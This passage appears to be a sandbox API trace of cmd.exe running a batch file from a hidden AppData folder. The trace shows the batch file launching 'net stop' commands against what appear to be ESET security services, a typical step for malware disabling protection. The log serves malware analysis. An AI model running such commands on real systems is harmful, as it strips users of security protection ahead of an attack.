GetProcessHeap () returned 0x3e0000 [0209.429] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0209.429] GetProcessHeap () returned 0x3e0000 [0209.429] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0209.429] GetProcessHeap () returned 0x3e0000 [0209.429] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0209.430] GetProcessHeap () returned 0x3e0000 [0209.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0209.430] GetProcessHeap () returned 0x3e0000 [0209.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0209.430] GetProcessHeap () returned 0x3e0000 [0209.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0209.430] GetProcessHeap () returned 0x3e0000 [0209.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0209.430] GetProcessHeap () returned 0x3e0000 [0209.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0209.430] GetProcessHeap () returned 0x3e0000 [0209.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0209.430] GetProcessHeap () returned 0x3e0000 [0209.430] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0209.431] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.431] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11ef [0209.431] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x6d2, lpOverlapped=0x0) returned 1 [0209.431] SetFilePointer (in: hFile=0x74, lDistanceToMove=4616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1208 [0209.432] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=25, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop EsgShKernel /y\r\n\n\r\n12 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 25 [0209.432] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.432] GetFileType (hFile=0x74) returned 0x1 [0209.432] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.432] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1208 [0209.432] GetProcessHeap () returned 0x3e0000 [0209.432] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0209.432] GetProcessHeap () returned 0x3e0000 [0209.432] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0209.436] _tell (_FileHandle=3) returned 4616 [0209.436] _close (_FileHandle=3) returned 0 [0209.436] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0209.436] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0209.436] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0209.436] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0209.436] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0209.436] _wcsicmp (_String1="net", _String2="CD") returned 11 [0209.436] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0209.436] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0209.436] _wcsicmp (_String1="net", _String2="REN") returned -4 [0209.436] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0209.436] _wcsicmp (_String1="net", _String2="SET") returned -5 [0209.436] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0209.436] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0209.436] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0209.436] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0209.436] _wcsicmp (_String1="net", _String2="MD") returned 1 [0209.436] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0209.436] _wcsicmp (_String1="net", _String2="RD") returned -4 [0209.436] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0209.436] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0209.436] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0209.436] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0209.436] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0209.436] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0209.436] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0209.436] _wcsicmp (_String1="net", _String2="VER") returned -8 [0209.436] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0209.436] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0209.436] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0209.436] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0209.436] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0209.436] _wcsicmp (_String1="net", _String2="START") returned -5 [0209.437] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0209.437] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0209.437] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0209.437] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0209.437] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0209.437] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0209.437] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0209.437] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0209.437] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0209.437] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0209.437] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0209.437] SetErrorMode (uMode=0x0) returned 0x1 [0209.437] GetProcessHeap () returned 0x3e0000 [0209.437] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0209.437] GetProcessHeap () returned 0x3e0000 [0209.437] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0209.438] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.438] GetProcessHeap () returned 0x3e0000 [0209.438] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0209.438] GetProcessHeap () returned 0x3e0000 [0209.438] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0209.438] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0209.438] GetProcessHeap () returned 0x3e0000 [0209.438] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0209.438] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.438] GetProcessHeap () returned 0x3e0000 [0209.438] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0209.439] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0209.439] GetProcessHeap () returned 0x3e0000 [0209.439] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0209.439] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.439] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.440] GetLastError () returned 0x2 [0209.440] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.440] GetLastError () returned 0x2 [0209.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.441] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.441] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.441] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.441] GetLastError () returned 0x2 [0209.442] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.442] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.442] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.443] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0209.443] SetErrorMode (uMode=0x0) returned 0x1 [0209.443] GetProcessHeap () returned 0x3e0000 [0209.443] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0209.443] GetProcessHeap () returned 0x3e0000 [0209.443] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0209.443] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.443] GetProcessHeap () returned 0x3e0000 [0209.443] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0209.443] GetProcessHeap () returned 0x3e0000 [0209.443] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0209.444] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0209.444] GetProcessHeap () returned 0x3e0000 [0209.444] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0209.444] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.444] GetProcessHeap () returned 0x3e0000 [0209.444] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0209.444] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0209.444] GetProcessHeap () returned 0x3e0000 [0209.444] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0209.445] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.445] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.445] GetLastError () returned 0x2 [0209.445] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.446] GetLastError () returned 0x2 [0209.446] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.446] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.446] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.447] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.447] GetLastError () returned 0x2 [0209.447] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.447] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.448] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.448] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0209.448] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0209.448] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0209.448] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.448] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop EsgShKernel /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop EsgShKernel /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop EsgShKernel /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x750, dwThreadId=0x730)) returned 1 [0209.453] CloseHandle (hObject=0x74) returned 1 [0209.453] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.453] GetProcessHeap () returned 0x3e0000 [0209.453] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.453] GetEnvironmentStringsW () returned 0x3f8408* [0209.453] GetProcessHeap () returned 0x3e0000 [0209.453] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.453] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.453] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0209.595] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0209.595] CloseHandle (hObject=0x78) returned 1 [0209.595] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0209.595] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0209.595] GetProcessHeap () returned 0x3e0000 [0209.595] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.595] GetEnvironmentStringsW () returned 0x3f8408* [0209.595] GetProcessHeap () returned 0x3e0000 [0209.595] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.596] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.596] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.596] GetProcessHeap () returned 0x3e0000 [0209.596] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.596] GetEnvironmentStringsW () returned 0x3f8408* [0209.596] GetProcessHeap () returned 0x3e0000 [0209.596] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.596] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.596] GetProcessHeap () returned 0x3e0000 [0209.596] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0209.596] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0209.596] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.596] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0209.596] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.596] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0209.597] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.597] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0209.597] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.597] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0209.597] SetConsoleInputExeNameW () returned 0x1 [0209.597] GetConsoleOutputCP () returned 0x1b5 [0209.597] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0209.597] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0209.598] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0209.598] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.598] SetFilePointer (in: hFile=0x78, lDistanceToMove=4616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1208 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0209.598] GetProcessHeap () returned 0x3e0000 [0209.598] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0209.598] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.598] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1208 [0209.599] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x6b9, lpOverlapped=0x0) returned 1 [0209.599] SetFilePointer (in: hFile=0x78, lDistanceToMove=4637, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x121d [0209.599] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=21, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ESHASRV /y\r\n/y\r\n\n\r\n12 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 21 [0209.599] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.599] GetFileType (hFile=0x78) returned 0x1 [0209.599] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.599] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x121d [0209.599] GetProcessHeap () returned 0x3e0000 [0209.599] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0209.599] GetProcessHeap () returned 0x3e0000 [0209.599] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0209.602] _tell (_FileHandle=3) returned 4637 [0209.602] _close (_FileHandle=3) returned 0 [0209.603] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0209.603] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0209.603] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0209.603] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0209.603] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0209.603] _wcsicmp (_String1="net", _String2="CD") returned 11 [0209.603] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0209.603] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0209.603] _wcsicmp (_String1="net", _String2="REN") returned -4 [0209.603] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0209.603] _wcsicmp (_String1="net", _String2="SET") returned -5 [0209.603] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0209.603] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0209.603] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0209.603] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0209.603] _wcsicmp (_String1="net", _String2="MD") returned 1 [0209.603] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0209.603] _wcsicmp (_String1="net", _String2="RD") returned -4 [0209.603] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0209.603] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0209.603] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0209.603] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0209.603] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0209.603] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0209.603] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0209.603] _wcsicmp (_String1="net", _String2="VER") returned -8 [0209.603] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0209.603] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0209.603] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0209.603] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0209.603] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0209.603] _wcsicmp (_String1="net", _String2="START") returned -5 [0209.603] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0209.603] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0209.603] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0209.603] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0209.603] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0209.604] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0209.604] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0209.604] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0209.604] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0209.604] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0209.604] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0209.604] SetErrorMode (uMode=0x0) returned 0x1 [0209.604] GetProcessHeap () returned 0x3e0000 [0209.604] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0209.604] GetProcessHeap () returned 0x3e0000 [0209.604] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0209.605] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.605] GetProcessHeap () returned 0x3e0000 [0209.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0209.605] GetProcessHeap () returned 0x3e0000 [0209.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0209.605] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 